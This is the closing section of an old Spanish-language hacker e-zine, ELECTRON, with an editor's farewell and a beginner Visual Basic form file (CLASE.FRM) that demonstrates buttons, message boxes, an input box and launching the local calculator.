-<[ 21 ]>-
`°ñø,¸,øñ°

Autor : El Editor
Titulo : Despedida y Comentario Final

Asi vamos llegando al termino de la tan esperada segunda .$!3$7!2z$.
edicion del ELECTRON esperamos k los articulos tratados x*#"~```"!Rn·$
hasta el momento sean del agrado e interes de muchos, z!~ ~@!
creemos que el tiempo de espera por parte de ustedes xZ~ `T
ha valido la pena... haci como tambien creemos que $? ^%$%·ç·#~~·^]ç*`$
nuestro trabajo esta siendo cada vez de una mejor $EL"··$·3$7~$~€P*:$¸
calidad. Bueno y desde aqui ya nos bamos despidiendo ?B
recordando a todos nuestros lectores que la revista `?2L
esta abierta a cualquier tipo de colaboracion, eso `#$m.......u@#~
seria todo por este numero, esperamos verlos pronto! ~2#tE$T$*"
`

ELECTRON SECURITY TEAM / electron_team@usa.net

CLASE.FRM

VERSION 5.00 
Begin VB.Form Form1
Caption = "Intro a Visual Basic"
ClientHeight = 3195
ClientLeft = 165
ClientTop = 450
ClientWidth = 5160
LinkTopic = "Form1"
ScaleHeight = 3195
ScaleWidth = 5160
StartUpPosition = 2 'CenterScreen
Begin VB.Frame Frame1
Caption = "OS que Usas"
Height = 1335
Left = 120
TabIndex = 5
Top = 1680
Width = 4815
Begin VB.OptionButton Option2
Caption = "Linux"
Height = 495
Left = 1320
TabIndex = 9
Top = 480
Width = 1095
End
Begin VB.OptionButton Option1
Caption = "Windows"
Height = 495
Left = 120
TabIndex = 8
Top = 480
Width = 1095
End
Begin VB.CommandButton Command4
Caption = "Status"
Height = 375
Left = 2520
TabIndex = 7
Top = 480
Width = 2055
End
Begin VB.Label Label3
Alignment = 2 'Center
BeginProperty Font
Name = "Courier New"
Size = 9.75
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 255
Left = 120
TabIndex = 6
Top = 960
Width = 4575
End
End
Begin VB.CommandButton Command3
Caption = "Input Box"
Height = 375
Left = 120
TabIndex = 3
Top = 1080
Width = 1335
End
Begin VB.CommandButton Command2
Caption = "Msg Box"
Height = 375
Left = 120
TabIndex = 2
Top = 600
Width = 1335
End
Begin VB.CommandButton Command1
Caption = "Calculadora"
Height = 375
Left = 120
TabIndex = 0
Top = 120
Width = 1335
End
Begin VB.Label Label2
Alignment = 2 'Center
BeginProperty Font
Name = "Courier New"
Size = 9.75
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 1560
TabIndex = 4
Top = 1080
Width = 3015
End
Begin VB.Label Label1
Alignment = 2 'Center
BeginProperty Font
Name = "Courier New"
Size = 9.75
Charset = 0
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 1560
TabIndex = 1
Top = 120
Width = 3015
End
Begin VB.Menu archivo
Caption = "&Archivo"
Begin VB.Menu sonido
Caption = "S&onido"
End
Begin VB.Menu salir
Caption = "&Salir"
End
End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Sub Command1_Click()
Label1.Caption = "La Calculadora se Ejecuto"
Dim a
a = Shell("C:\windows\calc.exe")
End Sub

Private Sub Command2_Click()
Dim b
b = MsgBox("31337 Msg Box")
End Sub

Private Sub Command3_Click()
Dim c As String
c = InputBox("Ingresa tu Nick...")
Label2.Caption = c
End Sub

Private Sub Command4_Click()
If Option1 Then
Label3.Caption = "Ocupas Windows"
End If

If Option2 Then
Label3.Caption = "Ocupas Linux"
End If
End Sub

Private Sub salir_Click()
Unload Me
End Sub

Private Sub sonido_Click()
Beep
End Sub

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT